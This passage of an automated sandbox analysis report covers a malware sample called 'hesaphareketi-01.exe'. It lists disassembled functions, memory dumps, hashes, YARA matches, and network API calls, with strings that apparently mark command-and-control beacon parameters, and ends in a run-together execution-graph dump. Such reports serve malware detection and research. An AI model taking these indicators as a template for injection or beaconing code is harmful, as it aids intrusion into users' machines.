                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                      • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                                      • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                                      • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75383420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-787714339
                                                                                      • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                      • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                                      • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                                      • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3443045126
                                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                      • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                                      • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                      • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                      • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:56.2%
                                                                                      Total number of Nodes:48
                                                                                      Total number of Limit Nodes:5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • getaddrinfo.WS2_32(?,00003038,?,00000000), ref: 00FCA4B4
                                                                                        • Part of subcall function 00FEAECF: closesocket.WS2_32(00FCABA8,00000000,?,?,00FCABA8,?,?), ref: 00FEAF04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocketgetaddrinfo
                                                                                      • String ID: &br=9$&un=$80$dat=
                                                                                      • API String ID: 1380972459-3709368510
                                                                                      • Opcode ID: 03f8ce8572b942c285e0f260c1858f741c5aefd839cb9d0c57a1ee46e63bdf82
                                                                                      • Instruction ID: b18b989de1564b287ff1cec8d3f591b8e5f0c4a6a9874697a7294d3800294f41
                                                                                      • Opcode Fuzzy Hash: 03f8ce8572b942c285e0f260c1858f741c5aefd839cb9d0c57a1ee46e63bdf82
                                                                                      • Instruction Fuzzy Hash: A142A3B1D0030AAFDB24DFA4C985FEE73B5AF48304F14462EE5199B242E734B945DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: wininet.dll
                                                                                      • API String ID: 0-3354682871
                                                                                      • Opcode ID: daf53c424aa2c196754768a01107e07183c0bef7d118568a5b9ccaf745aa9112
                                                                                      • Instruction ID: b74e3bbfeac92037dfce0eb13942a9b503f12060366bea3d8a5aae4deba7778e
                                                                                      • Opcode Fuzzy Hash: daf53c424aa2c196754768a01107e07183c0bef7d118568a5b9ccaf745aa9112
                                                                                      • Instruction Fuzzy Hash: A7C1E4B1A447447AE720EBB4CD47FEBB3EDAF04700F14451EF259E6181E7B86A009B65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08dfd1d386aba284fe2ceba3d4fe55a5abeffbbf90617dcbad19d8dc3e16f93f
                                                                                      • Instruction ID: fa2dc1bf2f79624cabcf72c1299533d3db3ed00c6a254e2f8f4615a05f80e47a
                                                                                      • Opcode Fuzzy Hash: 08dfd1d386aba284fe2ceba3d4fe55a5abeffbbf90617dcbad19d8dc3e16f93f
                                                                                      • Instruction Fuzzy Hash: 8931E4B0905206EFD715CF14C985FEAB7F8FB44354F18447DE8099B282C771AA41DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ee643b693398b86ab8ceb69b4505702790a8cf711abf2c03d681e3014912ab1
                                                                                      • Instruction ID: 626a1d607a751ffde41d3d60fe96b99f03a9f64aa0642c4c6c767d0119d037d6
                                                                                      • Opcode Fuzzy Hash: 2ee643b693398b86ab8ceb69b4505702790a8cf711abf2c03d681e3014912ab1
                                                                                      • Instruction Fuzzy Hash: 4531D4B0901206EFD715DF14C985FAAB3F8FB44354F18457DE8099B282C771AA41DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • getaddrinfo.WS2_32(?,00003038,?,00000000), ref: 00FCA4B4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: getaddrinfo
                                                                                      • String ID: &br=9$&un=$80$dat=
                                                                                      • API String ID: 300660673-3709368510
                                                                                      • Opcode ID: d21bb3b0aa3043bef178344d2777cb4d30962b50e9bd6d4cace37643bad55bf1
                                                                                      • Instruction ID: 968c4fa578620b523a08d1defd76d5a6cdb77903175ff7f443490b852add720d
                                                                                      • Opcode Fuzzy Hash: d21bb3b0aa3043bef178344d2777cb4d30962b50e9bd6d4cace37643bad55bf1
                                                                                      • Instruction Fuzzy Hash: 3AE1B2B0D0034A9FDB28DFA4C985FEE77B6AF44314F14861EE4199B241E374B905DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 489 feae2f-feae72 call fc6d6f call feb8df send
                                                                                      APIs
                                                                                      • send.WS2_32(00000000,00000000,?,?,?,?,00000000,00000000,?,00009FFA), ref: 00FEAE6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: send
                                                                                      • String ID:
                                                                                      • API String ID: 2809346765-0
                                                                                      • Opcode ID: 4172edb16a4c742ef59d4ceb39d1d87b9fac2e8ab9975d157d0b6f458ea94e4d
                                                                                      • Instruction ID: 700693c9feb87625494a36a1b13ea489fd8aa133bba95b0cd466706011b6c8be
                                                                                      • Opcode Fuzzy Hash: 4172edb16a4c742ef59d4ceb39d1d87b9fac2e8ab9975d157d0b6f458ea94e4d
                                                                                      • Instruction Fuzzy Hash: E6E032B6200609BBDA14EE9ADC42EEB77ADEFC8310F008409F908A3201C635BD118BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 494 feadaf-feadee call fc6d6f call feb8df socket
                                                                                      APIs
                                                                                      • socket.WS2_32(?,00000006,00000001,00000002,00000001,00000006,?,?,?), ref: 00FEADE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: socket
                                                                                      • String ID:
                                                                                      • API String ID: 98920635-0
                                                                                      • Opcode ID: a05225648e8802b157ab835291fd0fe7c601450b7227633575244b5490f42542
                                                                                      • Instruction ID: c71c57473f6cb3824791b2d3a0721a5e4f9bf92abe3b6f618b68c9ee0bea9f56
                                                                                      • Opcode Fuzzy Hash: a05225648e8802b157ab835291fd0fe7c601450b7227633575244b5490f42542
                                                                                      • Instruction Fuzzy Hash: B7E09A72600208BFCA10EE99DC45DDB73ADEFC8310B004409FD09A7201C634BE118BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 499 feae7f-feaec1 call fc6d6f call feb8df connect
                                                                                      APIs
                                                                                      • connect.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEAEBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: connect
                                                                                      • String ID:
                                                                                      • API String ID: 1959786783-0
                                                                                      • Opcode ID: d26fa255dcaac93edc731f10702dae1ce39af8382611534a015bfcb816758a3c
                                                                                      • Instruction ID: 2dc986a878c77c01650d9ea08402e33d9eed76c77b73277a732f6b0296def4ef
                                                                                      • Opcode Fuzzy Hash: d26fa255dcaac93edc731f10702dae1ce39af8382611534a015bfcb816758a3c
                                                                                      • Instruction Fuzzy Hash: 2CE09A72200308BFDA14EF99DC46CDB33ADEFC9310B004419F908A3201C630BE108BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 504 feaecf-feaf09 call fc6d6f call feb8df closesocket
                                                                                      APIs
                                                                                      • closesocket.WS2_32(00FCABA8,00000000,?,?,00FCABA8,?,?), ref: 00FEAF04
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocket
                                                                                      • String ID:
                                                                                      • API String ID: 2781271927-0
                                                                                      • Opcode ID: 0983c183679227790382b5d31dd3e8d8e86cda366afc7315b16c8a92912a6723
                                                                                      • Instruction ID: 1ef2ed4c2a955debded71054ce2f3b69bb888745bc28292391767ae48993c20b
                                                                                      • Opcode Fuzzy Hash: 0983c183679227790382b5d31dd3e8d8e86cda366afc7315b16c8a92912a6723
                                                                                      • Instruction Fuzzy Hash: 08E08C322006087BC620FA9ACC01CDB77AEDFC5310B00841AFA09AB201C671BA1287F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$!$!*$#F$($+]$,$/;$0$0}$2'$3q$5$8m$?$Ee$Jk$NO$ON$P$]g$`$`G$`l$g$ku$qQ$r-$s$s$s8$vr$~$R
                                                                                      • API String ID: 0-1562232700
                                                                                      • Opcode ID: f7c6343ada00241373b85ca07c6f56630a4f546417c823147a89f5fc4852dd85
                                                                                      • Instruction ID: d267ae1b7c221c57ad0c40a97be0f62c291385026a3a402641a77ca6d7b1f7d9
                                                                                      • Opcode Fuzzy Hash: f7c6343ada00241373b85ca07c6f56630a4f546417c823147a89f5fc4852dd85
                                                                                      • Instruction Fuzzy Hash: AE428BB0D05229CBEB64CF44CA99BDDFBB2BB45308F2081D9C5496B285C7B95AC9DF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?
                                                                                      • API String ID: 0-1684325040
                                                                                      • Opcode ID: 8a1ac5076f338c06c1f1fbcfabb60cd2befa89910fc18e8b8a6d757465b4d3ae
                                                                                      • Instruction ID: 4f31359e6dc6c91c2284e695b14ec4659c93460d8c401702a58302d165582937
                                                                                      • Opcode Fuzzy Hash: 8a1ac5076f338c06c1f1fbcfabb60cd2befa89910fc18e8b8a6d757465b4d3ae
                                                                                      • Instruction Fuzzy Hash: 79E1B6B1D04318ABDB15EFA4CC81BEFB7B9BF44300F18415AF509AA241EB745B45DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: =
                                                                                      • API String ID: 0-2322244508
                                                                                      • Opcode ID: e7ccc4f1ae3cfc49b6485787f80922a506e7c5073bde8c0114605eac1b0891a2
                                                                                      • Instruction ID: dca981164bbc8750dd9d997c970361c8d5852a1be504fd41312c26fc3dad3dd6
                                                                                      • Opcode Fuzzy Hash: e7ccc4f1ae3cfc49b6485787f80922a506e7c5073bde8c0114605eac1b0891a2
                                                                                      • Instruction Fuzzy Hash: B291E5719043486BCB11EBE5CC86FEEB7B9BF45300F04456EB50DAB182E778A644DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?
                                                                                      • API String ID: 0-1684325040
                                                                                      • Opcode ID: f7cd7a2b7d99ffda1985dd26a26c628036198f3272dff8f2d86cb79384caefe5
                                                                                      • Instruction ID: f68075e14e5a70da657a5d33f6342eff1c5d4a8071483526b9142394ff664e90
                                                                                      • Opcode Fuzzy Hash: f7cd7a2b7d99ffda1985dd26a26c628036198f3272dff8f2d86cb79384caefe5
                                                                                      • Instruction Fuzzy Hash: 8A71A3B1C00358ABDB25EFA5CC42FEFB779AF84300F08455AF509A6241EB345B45DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 549f992583639052fb82d7810b949de2dcb1d4915aa8a88e7564a5c74c47e26c
                                                                                      • Instruction ID: aed827fe1d1fc3dd90a59241c8d841e9d8c96e72f8dc230a319a416a457774c2
                                                                                      • Opcode Fuzzy Hash: 549f992583639052fb82d7810b949de2dcb1d4915aa8a88e7564a5c74c47e26c
                                                                                      • Instruction Fuzzy Hash: 5AE09A71E062028FC725CF05E509BA0F7E0FB81322F0894BAC8085B251E37284108B88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:4%
                                                                                      Dynamic/Decrypted Code Coverage:16.4%
                                                                                      Signature Coverage:8.1%
                                                                                      Total number of Nodes:657
                                                                                      Total number of Limit Nodes:77
60769->60768 61414 37cb9b0 17 API calls 61322 2db2205 LdrLoadDll Sleep NtAllocateVirtualMemory 61010 2da2c3c 61011 2da6dd0 2 API calls 61010->61011 61012 2da2c4c 61011->61012 61013 2da2c61 61012->61013 61014 2db4f60 NtClose 61012->61014 61014->61013 61091 2db0830 61096 2db083f 61091->61096 61092 2db08cc 61093 2db0886 61094 2db6d80 RtlFreeHeap 61093->61094 61095 2db0896 61094->61095 61096->61092 61096->61093 61097 2db08c7 61096->61097 61098 2db6d80 RtlFreeHeap 61097->61098 61098->61092 61324 37c9790 377 API calls 61416 3788196 14 API calls 61418 3794180 438 API calls 61419 37c9580 426 API calls 60802 2da93cc RtlFreeHeap 61332 378b260 315 API calls 61422 3787860 199 API calls 60817 2daf7c0 60818 2daf7e8 60817->60818 60830 2da59c0 60818->60830 60820 2daf84f 60821 2daf848 60821->60820 60837 2da5ad0 60821->60837 60823 2daf8e4 60824 2da5ad0 LdrInitializeThunk 60823->60824 60829 2dafa96 60823->60829 60825 2daf97b 60824->60825 60826 2da5ad0 LdrInitializeThunk 60825->60826 60825->60829 60827 2daf9f1 60826->60827 60828 2da5ad0 LdrInitializeThunk 60827->60828 60827->60829 60828->60829 60831 2da59f3 60830->60831 60832 2da5a17 60831->60832 60841 2db4b60 60831->60841 60832->60821 60834 2da5a3a 60834->60832 60835 2db4f60 NtClose 60834->60835 60836 2da5aba 60835->60836 60836->60821 60838 2da5af5 60837->60838 60846 2db4950 60838->60846 60842 2db4b7d 60841->60842 60845 37d2bc0 LdrInitializeThunk 60842->60845 60843 2db4ba9 60843->60834 60845->60843 60847 2db496d 60846->60847 60850 37d2b80 LdrInitializeThunk 60847->60850 60848 2da5b69 60848->60823 60850->60848 60933 2dab1c0 60934 2dab1e8 60933->60934 60935 2db6e60 RtlAllocateHeap 60934->60935 60937 2dab248 60935->60937 60936 2dab251 60937->60936 60944 2daa520 60937->60944 60939 2dab27a 60940 2daa520 3 API calls 60939->60940 60942 2dab2ff 60940->60942 60941 2db6d80 RtlFreeHeap 60943 